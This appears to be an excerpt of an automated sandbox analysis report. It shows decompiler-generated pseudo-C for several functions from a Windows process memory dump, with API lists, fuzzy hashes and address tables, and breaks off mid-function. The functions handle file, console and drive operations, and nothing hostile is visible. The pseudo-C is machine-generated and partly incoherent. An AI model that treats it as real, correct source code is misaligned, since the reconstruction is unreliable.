                                                • Part of subcall function 002B2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,002B3C29,?,00000000,-00000001,00000000,?,00000000), ref: 002B2D87
                                                • Part of subcall function 002B2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,002B3C29,?,00000000,-00000001,00000000,?,00000000), ref: 002B2D91
                                                • Part of subcall function 002B2D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,002B3C29,?,00000000,-00000001,00000000,?,00000000), ref: 002B2DA4
                                                • Part of subcall function 002B2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002B3C29,?,00000000,-00000001,00000000,?,00000000), ref: 002B2DAE
                                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,-00000001,00000000,?,00000000), ref: 002B3CC5
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 002B3CD0
                                                • Part of subcall function 002B2349: wcsrchr.MSVCRT ref: 002B234F
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Error$Mode$AttributesFileHeapLast_wcsicmpmemset$AllocCurrentDirectoryFullNamePathProcesslongjmpwcsrchr
                                              • String ID:
                                              • API String ID: 3402406610-0
                                              • Opcode ID: d6bfd726b73d2f1df54a02cd165208b7cbdfe06e4f70c21ff8f29b82499e3cea
                                              • Instruction ID: e0db6066bfdb753f3dfea348b0c58d60b0832c73107f7511b59b2f659c9c200c
                                              • Opcode Fuzzy Hash: d6bfd726b73d2f1df54a02cd165208b7cbdfe06e4f70c21ff8f29b82499e3cea
                                              • Instruction Fuzzy Hash: 0C51A831A202169BCB24EFA4E8897FE77F5EF48790F14045AE945E7291EB709E90CF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AB710, Relevance: 7.6, APIs: 5, Instructions: 132COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 66%
                                              			E002AB710(intOrPtr _a4) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1088;
				intOrPtr _v1092;
				void* _v1096;
				char _v1100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				intOrPtr _t43;
				int _t46;
				char _t67;
				signed int _t85;

				_t41 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t41 ^ _t85;
				_t43 = _a4;
				_t84 = 0;
				_v1092 = _t43;
				_push(0);
				_push(0x2db8f8);
				L002B82C1();
				_t67 = 1;
				if(_t43 != 0) {
					 *0x2db8b0 = 1;
					L12:
					return E002B6FD0(_t67, _t67, _v8 ^ _t85, _t79, 0x104, _t84);
				}
				if( *0x2e3ccc == 0) {
					if( *0x2e8058 != 0) {
						goto L2;
					}
					_t46 = 1;
					if( *0x2e3cc4 == 0) {
						L3:
						_v1088 = _t46;
						_v564 = _t84;
						_v560 = _t67;
						_v556 = 0x104;
						memset( &_v1084, _t84, 0x104);
						_v28 = _t84;
						_v24 = _t67;
						_v20 = 0x104;
						memset( &_v548, _t84, 0x104);
						_t84 = 0x7ee3;
						if(E002B0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0 && E002B0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
							_t63 = _v28;
							if(_v28 == 0) {
								_t63 =  &_v548;
							}
							_t76 = _v564;
							if(_v564 == 0) {
								_t76 =  &_v1084;
							}
							_t79 =  &_v1088;
							_t67 = E002B5FC8(_v1092,  &_v1088, _t76, _v556, _t63, _v20,  &_v1100,  &_v1096);
							if(_t67 == 0) {
								if(_v28 == 0) {
									_t79 =  &_v548;
								}
								_t78 = _v564;
								if(_v564 == 0) {
									_t78 =  &_v1084;
								}
								_t67 = E002AB97C(_t78, _t79, _v1088, _v1100, _v1096);
							}
						}
						 *0x2db8b0 = _t67;
						__imp__??_V@YAXPAX@Z(_v28);
						__imp__??_V@YAXPAX@Z(_v564);
						goto L12;
					}
				}
				L2:
				_t46 = _t84;
				goto L3;
			}
























                                              0x002ab71b
                                              0x002ab722
                                              0x002ab725
                                              0x002ab72b
                                              0x002ab72d
                                              0x002ab733
                                              0x002ab734
                                              0x002ab739
                                              0x002ab741
                                              0x002ab745
                                              0x002b9d59
                                              0x002ab877
                                              0x002ab889
                                              0x002ab889
                                              0x002ab751
                                              0x002b9d6a
                                              0x00000000
                                              0x00000000
                                              0x002b9d70
                                              0x002b9d78
                                              0x002ab759
                                              0x002ab75e
                                              0x002ab76b
                                              0x002ab773
                                              0x002ab779
                                              0x002ab77f
                                              0x002ab787
                                              0x002ab790
                                              0x002ab793
                                              0x002ab799
                                              0x002ab7a9
                                              0x002ab7c4
                                              0x002ab7e7
                                              0x002ab7ec
                                              0x002b9d83
                                              0x002b9d83
                                              0x002ab7f2
                                              0x002ab7fa
                                              0x002b9d8e
                                              0x002b9d8e
                                              0x002ab811
                                              0x002ab82a
                                              0x002ab82e
                                              0x002ab835
                                              0x002ab88c
                                              0x002ab88c
                                              0x002ab837
                                              0x002ab83f
                                              0x002ab894
                                              0x002ab894
                                              0x002ab858
                                              0x002ab858
                                              0x002ab82e
                                              0x002ab85d
                                              0x002ab863
                                              0x002ab870
                                              0x00000000
                                              0x002ab876
                                              0x002b9d7e
                                              0x002ab757
                                              0x002ab757
                                              0x00000000

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memset$_setjmp3
                                              • String ID:
                                              • API String ID: 4215035025-0
                                              • Opcode ID: 52d00a45028ca93fc6fb235763fe2d8b62340be3a0c7197ebeca0b34e02a65eb
                                              • Instruction ID: 5279b20acd8033cd3984ed92a4605d16cc25ffa529711b0f30ae4a2169e569a6
                                              • Opcode Fuzzy Hash: 52d00a45028ca93fc6fb235763fe2d8b62340be3a0c7197ebeca0b34e02a65eb
                                              • Instruction Fuzzy Hash: 1341C371E212699FCB21DF65DC84AEEBB79EB45340F0401AEE609A7102DB349E94CF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C8F66, Relevance: 7.6, APIs: 5, Instructions: 106COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 59%
                                              			E002C8F66(void* __ecx, int __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				void* _v564;
				void _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				signed int _t55;
				int _t56;
				void* _t66;
				void* _t70;
				int _t71;
				signed int _t74;

				_t69 = __edx;
				_t31 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t31 ^ _t74;
				_v560 = 1;
				_t71 = 0;
				_v556 = 0x104;
				_v564 = 0;
				_t56 = __edx;
				_t70 = __ecx;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				if(E002B0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0 || E002B0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
					L13:
					__imp__??_V@YAXPAX@Z(_v28);
					__imp__??_V@YAXPAX@Z();
					return E002B6FD0(_t71, _t56, _v8 ^ _t74, _t69, _t70, _t71, _v564);
				} else {
					_t64 = _v564;
					if(_v564 == 0) {
						_t64 =  &_v1084;
					}
					_t69 = _v556;
					if(E002B2D22(_t64, _v556, _t70) == 0) {
						_t65 = _v28;
						if(_v28 == 0) {
							_t65 =  &_v548;
						}
						_t69 = _v20;
						if(E002B2D22(_t65, _v20, _t56) == 0) {
							_t55 = _v28;
							if(_t55 == 0) {
								_t55 =  &_v548;
							}
							_t66 = _v564;
							if(_t66 == 0) {
								_t66 =  &_v1084;
							}
							__imp___wcsicmp(_t66, _t55);
							asm("sbb esi, esi");
							_t71 =  ~_t55 + 1;
						}
					}
					goto L13;
				}
			}






















                                              0x002c8f66
                                              0x002c8f71
                                              0x002c8f78
                                              0x002c8f83
                                              0x002c8f8b
                                              0x002c8f8d
                                              0x002c8f99
                                              0x002c8fa1
                                              0x002c8fa3
                                              0x002c8fa5
                                              0x002c8fad
                                              0x002c8fb5
                                              0x002c8fb9
                                              0x002c8fc5
                                              0x002c8ff1
                                              0x002c9082
                                              0x002c9085
                                              0x002c9092
                                              0x002c90ab
                                              0x002c901a
                                              0x002c901a
                                              0x002c9022
                                              0x002c9024
                                              0x002c9024
                                              0x002c902a
                                              0x002c9038
                                              0x002c903a
                                              0x002c903f
                                              0x002c9041
                                              0x002c9041
                                              0x002c9047
                                              0x002c9052
                                              0x002c9054
                                              0x002c9059
                                              0x002c905b
                                              0x002c905b
                                              0x002c9061
                                              0x002c9069
                                              0x002c906b
                                              0x002c906b
                                              0x002c9073
                                              0x002c907e
                                              0x002c9081
                                              0x002c9081
                                              0x002c9052
                                              0x00000000
                                              0x002c9038

                                              APIs
                                              • memset.MSVCRT ref: 002C8FA5
                                              • memset.MSVCRT ref: 002C8FC5
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • _wcsicmp.MSVCRT ref: 002C9073
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002C9085
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002C9092
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memset$_wcsicmp
                                              • String ID:
                                              • API String ID: 1670951261-0
                                              • Opcode ID: 6d74655c3985efdef1dd1eec827341d2a3985be2939a269e68cb5703ef650f17
                                              • Instruction ID: 67f854de2f3808b269f9022c150a7823f0d09c1bbb01711a14f9cac897efe96a
                                              • Opcode Fuzzy Hash: 6d74655c3985efdef1dd1eec827341d2a3985be2939a269e68cb5703ef650f17
                                              • Instruction Fuzzy Hash: E3316072A102699BDB24DBA4DC89BEFBB78EF54354F0401AEE905D3141EB349E94CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C8E52, Relevance: 7.6, APIs: 5, Instructions: 103fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 48%
                                              			E002C8E52(intOrPtr __edx, long _a4, DWORD* _a8) {
				void _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ecx;
				void _t29;
				long _t38;
				void* _t39;
				signed int _t45;
				long _t46;
				void* _t52;
				void* _t54;
				intOrPtr _t57;
				void _t60;
				long _t61;

				_v16 = _v16 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_push(_t39);
				_push(_t39);
				_v12 = __edx;
				_t54 = 2;
				_t61 = E002A5DB5(_t39, _t54);
				if(_t61 == 0xffffffff) {
					_t52 = 0x6e;
					E002C985A(_t52);
					L2:
					E002C85E9(0, 1);
				}
				_t38 = _a4;
				while(1) {
					_t23 =  &_v8;
					__imp___get_osfhandle(0);
					if(ReadFile( &_v8, _t61, _t38, _a8, _t23) == 0) {
						break;
					}
					_t57 = _v12;
					_t29 = _v8;
					_t60 = _t29;
					_t45 =  *(_t57 + 0x1c);
					if((_t45 & 0x0000c000) == 0) {
						if(_t60 <= 2) {
							L9:
							_t45 = _t45 | 0x00008000;
						} else {
							_t57 = _v12;
							if( *_t38 != 0xfeff) {
								goto L9;
							} else {
								_t45 = _t45 | 0x00004000;
							}
						}
						 *(_t57 + 0x1c) = _t45;
					}
					if(_t60 == 0) {
						_t46 = _v16;
					} else {
						asm("sbb ecx, ecx");
						_t46 = E002C6CEF( ~((_t45 & 0x00008002) - 0x8002) + 1, _t38,  &_v8,  &_v20);
						_t29 = _v8;
						_v16 = _t46;
					}
					if(_t29 == _a8) {
						continue;
					}
					if(_t46 == 0) {
						_t31 = _t29 - _t60;
						__imp___get_osfhandle(1);
						SetFilePointer(_t29 - _t60, _t61, _t31, _t46);
					}
					return _t61;
				}
				 *0x2e3cf0 = GetLastError();
				E002ADB92(_t61);
				_push(0);
				_push( *0x2e3cf0);
				E002AC5A2(_t61);
				goto L2;
			}


















                                              0x002c8e5a
                                              0x002c8e5e
                                              0x002c8e65
                                              0x002c8e66
                                              0x002c8e69
                                              0x002c8e6c
                                              0x002c8e72
                                              0x002c8e77
                                              0x002c8e7b
                                              0x002c8e7c
                                              0x002c8e81
                                              0x002c8e86
                                              0x002c8e86
                                              0x002c8e8b
                                              0x002c8e8e
                                              0x002c8e90
                                              0x002c8e99
                                              0x002c8ea9
                                              0x00000000
                                              0x00000000
                                              0x002c8eaf
                                              0x002c8eb2
                                              0x002c8eb5
                                              0x002c8eb7
                                              0x002c8ec0
                                              0x002c8ec5
                                              0x002c8edc
                                              0x002c8edc
                                              0x002c8ec7
                                              0x002c8ecf
                                              0x002c8ed2
                                              0x00000000
                                              0x002c8ed4
                                              0x002c8ed4
                                              0x002c8ed4
                                              0x002c8ed2
                                              0x002c8ee2
                                              0x002c8ee2
                                              0x002c8ee7
                                              0x002c8f10
                                              0x002c8ee9
                                              0x002c8efe
                                              0x002c8f06
                                              0x002c8f08
                                              0x002c8f0b
                                              0x002c8f0b
                                              0x002c8f16
                                              0x00000000
                                              0x00000000
                                              0x002c8f1e
                                              0x002c8f23
                                              0x002c8f27
                                              0x002c8f2f
                                              0x002c8f2f
                                              0x002c8f3d
                                              0x002c8f3d
                                              0x002c8f48
                                              0x002c8f4d
                                              0x002c8f52
                                              0x002c8f54
                                              0x002c8f5a
                                              0x00000000

                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 002C8E99
                                              • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 002C8EA1
                                              • _get_osfhandle.MSVCRT ref: 002C8F27
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,00000000,00000000), ref: 002C8F2F
                                                • Part of subcall function 002C85E9: longjmp.MSVCRT(002DB8F8,00000001,00000000,002C8DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 002C865D
                                                • Part of subcall function 002C85E9: memset.MSVCRT ref: 002C86B6
                                                • Part of subcall function 002C85E9: memset.MSVCRT ref: 002C86E4
                                                • Part of subcall function 002C85E9: memset.MSVCRT ref: 002C8712
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 002C8F40
                                                • Part of subcall function 002ADB92: _close.MSVCRT ref: 002ADBC1
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
                                              • String ID:
                                              • API String ID: 288106245-0
                                              • Opcode ID: 7c85d64800edbe0138e42737bec97cf8ce40217ef92bd521cd79dc976a4a0c7b
                                              • Instruction ID: 8ecfaddb29d438b01a86441b45f83b067c2ef307c30d6b59ca35d081afbda4d4
                                              • Opcode Fuzzy Hash: 7c85d64800edbe0138e42737bec97cf8ce40217ef92bd521cd79dc976a4a0c7b
                                              • Instruction Fuzzy Hash: 7A31B371E20145ABEB18DF65D889FBE77A9EB84311F20826EF505D72C0DF749D508B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A5712, Relevance: 7.6, APIs: 5, Instructions: 98fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 85%
                                              			E002A5712(void* __ecx, long __edx, DWORD* _a4, struct _OVERLAPPED* _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v8;
				intOrPtr _v16;
				void* _t19;
				signed int _t26;
				void* _t31;
				void* _t32;
				intOrPtr* _t33;
				signed int _t43;
				intOrPtr _t52;
				void* _t54;
				struct _OVERLAPPED* _t55;
				void* _t58;
				void* _t59;

				_t55 = _a8;
				_t33 = __edx;
				_v8 = 0;
				_t59 = __ecx;
				 *0x2cd5cc = 0;
				__imp___get_osfhandle(0, _t54, _t58, _t32, __ecx, __ecx);
				if(ReadFile(0, __ecx, __edx, _a4, _t55) == 0) {
					L18:
					 *0x2e3cf0 = GetLastError();
					_t19 = E002B0178(E002ADB92(_t59));
					E002ADB92(_a16);
					if(_t19 == 0) {
						DeleteFileW(_a20);
					}
					E002C85E9( *0x2e3cf0, 1);
					asm("int3");
					E002B1040(_v8, _t55, _v16);
					return 0;
				} else {
					_t43 = _t55->Internal;
					if(_t43 == 0) {
						if(GetLastError() == 0x3e3) {
							goto L18;
						} else {
							_t43 = _t55->Internal;
							if(_t43 != 0) {
								goto L2;
							} else {
								 *0x2e3cf0 =  *0x2e3cf0 & _t43;
								_t31 = 0;
							}
							goto L5;
						}
					} else {
						L2:
						_t52 = _a12;
						_t26 =  *(_t52 + 0x1c);
						if((_t26 & 0x0000c000) == 0) {
							if(_t43 < 2 ||  *_t33 != 0xfeff) {
								_t26 = _t26 | 0x00008000;
							} else {
								_t26 = _t26 | 0x00004000;
							}
							 *(_t52 + 0x1c) = _t26;
						}
						if((_t26 & 0x00008002) == 0x8002) {
							E002C6CEF(1, _t33, _t55,  &_v8);
							if(_t55->Internal != _t55->Internal) {
								 *0x2cd5cc = 1;
							}
						}
						_t31 = 1;
						L5:
						return _t31;
					}
				}
			}
















                                              0x002a571c
                                              0x002a5726
                                              0x002a5728
                                              0x002a572b
                                              0x002a572d
                                              0x002a5734
                                              0x002a5744
                                              0x002b974a
                                              0x002b9752
                                              0x002b975f
                                              0x002b9769
                                              0x002b9770
                                              0x002b9775
                                              0x002b9775
                                              0x002b9784
                                              0x002b9789
                                              0x002b9792
                                              0x002a583e
                                              0x002a574a
                                              0x002a574a
                                              0x002a574e
                                              0x002b9709
                                              0x00000000
                                              0x002b970b
                                              0x002b970b
                                              0x002b970f
                                              0x00000000
                                              0x002b9715
                                              0x002b9715
                                              0x002b971b
                                              0x002b971b
                                              0x00000000
                                              0x002b970f
                                              0x002a5754
                                              0x002a5754
                                              0x002a5754
                                              0x002a5757
                                              0x002a575f
                                              0x002a577f
                                              0x002a578b
                                              0x002a5795
                                              0x002a5795
                                              0x002a5795
                                              0x002a5790
                                              0x002a5790
                                              0x002a576a
                                              0x002b972e
                                              0x002b9735
                                              0x002b973b
                                              0x002b973b
                                              0x002b9735
                                              0x002a5772
                                              0x002a5773
                                              0x002a5779
                                              0x002a5779
                                              0x002a574e

                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 002A5734
                                              • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002C896D,00000021,?,?,00000000,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 002A573C
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 002B96FE
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 002B974A
                                              • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 002B9775
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                              • String ID:
                                              • API String ID: 3588551418-0
                                              • Opcode ID: b5618808e204041e134805e39a71e2cd62d3cd19c0485a92f25b8edbd5f08afa
                                              • Instruction ID: 1c524bb7e4368ee1796796545b4cd80d0b630552b6b98c01702b6f9fa11318e5
                                              • Opcode Fuzzy Hash: b5618808e204041e134805e39a71e2cd62d3cd19c0485a92f25b8edbd5f08afa
                                              • Instruction Fuzzy Hash: 9531E471A30156DBDB18DF25EC9997BB7A9FB85350B14442AE902E7250DF30DCA0DF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B6A96, Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E002B6A96(short __ecx) {
				signed int _v8;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				long _v28;
				char _v32;
				int _v36;
				void _v556;
				long _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				short _t34;
				short _t35;
				int _t38;
				WCHAR* _t39;
				void* _t50;
				short _t51;
				DWORD* _t52;
				signed int _t54;

				_t22 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t22 ^ _t54;
				_v32 = 1;
				_t52 = 0;
				_v28 = 0x104;
				_v36 = 0;
				_t51 = __ecx;
				memset( &_v556, 0, 0x104);
				if(E002B0C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t34 = 0x3a;
					_v18 = _t34;
					_t35 = 0x5c;
					_v16 = _t35;
					_v14 = 0;
					_v20 = _t51;
					_t38 = GetDriveTypeW( &_v20);
					if(_t38 <= 1) {
						L8:
						_t52 = 1;
					} else {
						if(_t38 != 2 && _t38 != 5) {
							_t39 = _v36;
							if(_t39 == 0) {
								_t39 =  &_v556;
							}
							if(GetVolumeInformationW( &_v20, _t39, _v28,  &_v564, _t52, _t52, _t52, _t52) == 0) {
								if(GetLastError() == 5) {
									goto L8;
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E002B6FD0(_t52, 0x104, _v8 ^ _t54, _t50, _t51, _t52, _v36);
			}

























                                              0x002b6aa1
                                              0x002b6aa8
                                              0x002b6ab3
                                              0x002b6ab7
                                              0x002b6ab9
                                              0x002b6ac3
                                              0x002b6ac8
                                              0x002b6acb
                                              0x002b6af1
                                              0x002b6af5
                                              0x002b6af6
                                              0x002b6afc
                                              0x002b6afd
                                              0x002b6b03
                                              0x002b6b0b
                                              0x002b6b0f
                                              0x002b6b18
                                              0x002b6b71
                                              0x002b6b73
                                              0x002b6b1a
                                              0x002b6b1d
                                              0x002b6b24
                                              0x002b6b29
                                              0x002b6b69
                                              0x002b6b69
                                              0x002b6b46
                                              0x002c156d
                                              0x00000000
                                              0x002c1573
                                              0x002c156d
                                              0x002b6b46
                                              0x002b6b1d
                                              0x002b6b18
                                              0x002b6b4f
                                              0x002b6b68

                                              APIs
                                              • memset.MSVCRT ref: 002B6ACB
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000000), ref: 002B6B0F
                                              • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 002B6B3E
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002B6B4F
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memset$DriveInformationTypeVolume
                                              • String ID:
                                              • API String ID: 285405857-0
                                              • Opcode ID: 485f1886b4f4dc1039d657309561c32b81abc76f27cd2813c29dbc47a2fc63ff
                                              • Instruction ID: 185f072a65501b8675de28ea24b4750259021f8376a393c729c686873098f117
                                              • Opcode Fuzzy Hash: 485f1886b4f4dc1039d657309561c32b81abc76f27cd2813c29dbc47a2fc63ff
                                              • Instruction Fuzzy Hash: C021B571D20119ABDB20DFA4DC8DAFFBBB8EF05794F04015AE505E3150DB799A50CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B0662, Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 24%
                                              			E002B0662(signed short** __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t4;
				void* _t6;
				long _t8;
				signed int _t11;
				void* _t12;
				signed int _t15;
				long _t16;
				void* _t17;
				void* _t20;
				void* _t24;
				signed short** _t30;
				void* _t31;
				long _t33;
				void* _t34;
				signed int _t35;

				_push(__ecx);
				_t4 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t4 ^ _t35;
				_push(_t15);
				_t30 = __ecx;
				_t28 = 0x8000;
				_t19 =  *__ecx;
				_t6 = E002AD120( *__ecx, 0x8000, __ecx);
				_t16 = _t15 | 0xffffffff;
				while(1) {
					_t33 = _t6;
					if(_t33 != _t16) {
						break;
					}
					if( *0x2e3cf0 != 2) {
						_t20 = 0x6e;
						E002C985A(_t20);
						goto L12;
					} else {
						_t11 =  *( *_t30) & 0x0000ffff;
						if(_t11 == 0x41 || _t11 == 0x42) {
							_t12 = E002AC5A2(_t19);
							_t24 = 0x2341;
							__imp___getch(0);
							if(_t12 == 3) {
								EnterCriticalSection( *0x2d3858);
								 *0x2cd544 = 1;
								LeaveCriticalSection( *0x2d3858);
								goto L12;
							} else {
								_t19 =  *_t30;
								_t28 = 0x8000;
								_t6 = E002AD120( *_t30, 0x8000, _t24);
								continue;
							}
						} else {
							_push(0);
							_push(0x236c);
							E002AC5A2(_t19);
							L12:
							_t8 = _t16;
						}
					}
					L3:
					_pop(_t31);
					_pop(_t34);
					_pop(_t17);
					return E002B6FD0(_t8, _t17, _v8 ^ _t35, _t28, _t31, _t34);
				}
				__imp___get_osfhandle(0);
				SetFilePointer(_t6, _t33, _t30[2], 0);
				_t8 = _t33;
				goto L3;
			}






















                                              0x002b0667
                                              0x002b0668
                                              0x002b066f
                                              0x002b0672
                                              0x002b0675
                                              0x002b0677
                                              0x002b067d
                                              0x002b067f
                                              0x002b0684
                                              0x002b0687
                                              0x002b0687
                                              0x002b068b
                                              0x00000000
                                              0x00000000
                                              0x002bcb84
                                              0x002bcbf6
                                              0x002bcbf7
                                              0x00000000
                                              0x002bcb86
                                              0x002bcb88
                                              0x002bcb8e
                                              0x002bcbac
                                              0x002bcbb2
                                              0x002bcbb3
                                              0x002bcbbc
                                              0x002bcbd6
                                              0x002bcbe2
                                              0x002bcbec
                                              0x00000000
                                              0x002bcbbe
                                              0x002bcbbf
                                              0x002bcbc1
                                              0x002bcbc6
                                              0x00000000
                                              0x002bcbc6
                                              0x002bcb95
                                              0x002bcb95
                                              0x002bcb97
                                              0x002bcb9c
                                              0x002bcbfc
                                              0x002bcbfc
                                              0x002bcbfc
                                              0x002bcb8e
                                              0x002b06a9
                                              0x002b06ac
                                              0x002b06ad
                                              0x002b06b0
                                              0x002b06b9
                                              0x002b06b9
                                              0x002b0699
                                              0x002b06a1
                                              0x002b06a7
                                              0x00000000

                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 002B0699
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,002A69F2,?,00000001,?,?,00000000), ref: 002B06A1
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: FilePointer_get_osfhandle
                                              • String ID:
                                              • API String ID: 1013686580-0
                                              • Opcode ID: 5b78e7f8009c156f68e5c39201b8fefb2ff3e78fe913394eae424657ffad8762
                                              • Instruction ID: 1158af3ea201557a7d0e0849ea9fef7867ac1f8bb3c73d8f3a0c4cd8a125cae5
                                              • Opcode Fuzzy Hash: 5b78e7f8009c156f68e5c39201b8fefb2ff3e78fe913394eae424657ffad8762
                                              • Instruction Fuzzy Hash: 1A11E432264245AFD7246B29FC8EFAD77A5EB45750F30051AF106AB1E0CEB1ADA0CA54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C7EC0, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 73%
                                              			E002C7EC0(void* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v30;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				struct _CHAR_INFO _v36;
				struct _COORD _v40;
				struct _SMALL_RECT _v48;
				signed int _t19;
				union %anon259 _t30;
				void* _t42;
				void* _t49;
